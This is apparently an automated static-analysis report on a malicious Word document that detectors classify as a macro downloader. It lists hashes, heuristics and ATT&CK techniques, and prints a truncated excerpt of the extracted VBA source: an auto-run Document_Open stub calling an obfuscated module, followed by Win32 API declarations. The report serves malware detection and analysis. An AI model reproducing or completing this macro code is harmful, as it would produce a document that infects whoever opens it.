Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b0d13a55b6d85e90…

MALICIOUS

Office (OOXML)

195.8 KB Created: 2019-11-01 07:42:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2020-07-24
MD5: 2afb4d0c2a4500bfe05b42ff5c2ace44 SHA-1: 6ba4c3ad87e8cd8ddabedb99e87de022106ebe83 SHA-256: b0d13a55b6d85e9018c949cae55705da82ccb952da147bd5779315028c13b5d8
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with a Document_Open macro. This macro executes a Shell() call, indicating an attempt to download and run a second-stage payload. The presence of VBA macros and the use of Shell() are strong indicators of a downloader malware. No specific family could be identified.

Heuristics 6

  • ClamAV: Doc.Downloader.Generic-8011192-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 50994 bytes
SHA-256: 11aaf8c71e7d5994c21a21bc4918c5b989c9d401655308b9eeac7d5540f8346f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    jfkjg345g.skdk
End Sub

Attribute VB_Name = "jfkjg345g"
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type

#If VBA7 Then
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal HKL As LongPtr, ByVal flags As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As LongPtr) As LongPtr
Declare PtrSafe Function BringWindowToTop Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Sub GoodNight Lib "kernel32" Alias "Sleep" (ByVal milliseconds As LongPtr)
Declare PtrSafe Function CharToOem Lib "user32" Alias "CharToOemA" (ByVal lpszSrc As String, ByVal lpszDst As String) As LongPtr
Declare PtrSafe Function CharToOemBuff Lib "user32" Alias "CharToOemBuffA" (ByVal lpszSrc As String, ByVal lpszDst As String, ByVal cchDstLength As LongPtr) As LongPtr
Declare PtrSafe Function CharUpper Lib "user32" Alias "CharUpperA" (ByVal lpsz As String) As String
Declare PtrSafe Function CheckDlgButton Lib "user32" Alias "CheckDLGButtonA" (ByVal hDlg As LongPtr, ByVal nIDButton As LongPtr, ByVal wCheck As LongPtr) As LongPtr
Declare PtrSafe Function CheckMenuItem Lib "user32" (ByVal hMenu As LongPtr, ByVal wIDCheckItem As LongPtr, ByVal wCheck As LongPtr) As LongPtr
Declare PtrSafe Function CheckMenuRadioItem Lib "user32" (ByVal hMenu As LongPtr, ByVal un1 As LongPtr, ByVal un2 As LongPtr, ByVal un3 As LongPtr, ByVal un4 As LongPtr) As Boolean
Declare PtrSafe Function CheckRadioButton Lib "user32" Alias "CheckRadioButtonA" (ByVal hDlg As LongPtr, ByVal nIDFirstButton As LongPtr, ByVal nIDLastButton As LongPtr, ByVal nIDCheckButton As LongPtr) As LongPtr
Declare PtrSafe Function CloseClipboard Lib "user32" () As LongPtr
Declare PtrSafe Function CloseDesktop Lib "user32" (ByVal hDesktop As LongPtr) As Boolean
Declare PtrSafe Function CloseWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function CreateIcon Lib "user32" (ByVal hInstance As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal nPlanes As Byte, ByVal nBitsPixel As Byte, lpANDbits As Byte, lpXORbits As Byte) As LongPtr
Declare PtrSafe Function CreateIconFromResource Lib "user32" (presbits As Byte, ByVal dwResSize As LongPtr, ByVal fIcon As LongPtr, ByVal dwVer As LongPtr) As LongPtr
Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As 
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 168448 bytes
SHA-256: e2bcffdf383a81e978f6e0d5f8ac8a8b3e70ed0ed7acbd3eac1b1e4fff2b7da2
Detection
ClamAV: Doc.Downloader.Generic-8011192-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.